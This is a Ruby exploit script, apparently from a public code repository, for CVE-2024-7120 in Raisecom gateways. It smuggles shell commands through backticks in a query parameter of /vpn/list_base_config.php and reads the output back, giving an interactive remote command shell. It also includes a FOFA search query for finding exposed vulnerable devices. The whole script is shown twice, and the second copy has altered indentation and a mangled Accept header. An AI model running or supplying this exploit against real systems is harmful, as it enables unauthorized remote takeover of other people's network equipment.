komodoooo/rgdr.rb

## rgdr.rb
require 'http'
require 'openssl'

puts """
CVE-2024-7120
Raisecom gateway RCE exploit
By komodo\n
"""

=begin

FOFA query to search vulnerable targets:
title="web user login" && body="<META content\=\"MSHTML 6.00.2900.5583\" name\=GENERATOR></HEAD>"

=end

def main(url, cmd)
    url.delete_suffix("/") unless url[-1..-1] != "/"
    @ctx = OpenSSL::SSL::SSLContext.new()
    @ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
    headerz={"Accept"=>"*/*","Accept-Encoding"=>"gzip, deflate", "Connection"=>"keep-alive"}
    r=HTTP.get(url+"/vpn/list_base_config.php?type=mod&parts=base_config&template=`#{cmd.gsub(" ","+")}>/www/tmp/info.html`",
               :headers=>headerz, :ssl_context=>@ctx)
    if r.code != 200
        abort("Not vulnerable")
    else
        puts HTTP.get(url+"/tmp/info.html", :ssl_context=>@ctx).body
    end
end

begin
    print"\nBase URL: "
    u=gets.chomp
    while true
        print"\n> "
        main(u, gets.chomp)
    end
rescue => e
    abort(e.to_s)
end
	require 'http'
	require 'openssl'

	puts """
	CVE-2024-7120
	Raisecom gateway RCE exploit
	By komodo\n
	"""

	=begin

	FOFA query to search vulnerable targets:
	title="web user login" && body="<META content\=\"MSHTML 6.00.2900.5583\" name\=GENERATOR></HEAD>"

	=end

	def main(url, cmd)
	url.delete_suffix("/") unless url[-1..-1] != "/"
	@ctx = OpenSSL::SSL::SSLContext.new()
	@ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
	headerz={"Accept"=>"/","Accept-Encoding"=>"gzip, deflate", "Connection"=>"keep-alive"}
	r=HTTP.get(url+"/vpn/list_base_config.php?type=mod&parts=base_config&template=`#{cmd.gsub(" ","+")}>/www/tmp/info.html`",
	:headers=>headerz, :ssl_context=>@ctx)
	if r.code != 200
	abort("Not vulnerable")
	else
	puts HTTP.get(url+"/tmp/info.html", :ssl_context=>@ctx).body
	end
	end

	begin
	print"\nBase URL: "
	u=gets.chomp
	while true
	print"\n> "
	main(u, gets.chomp)
	end
	rescue => e
	abort(e.to_s)
	end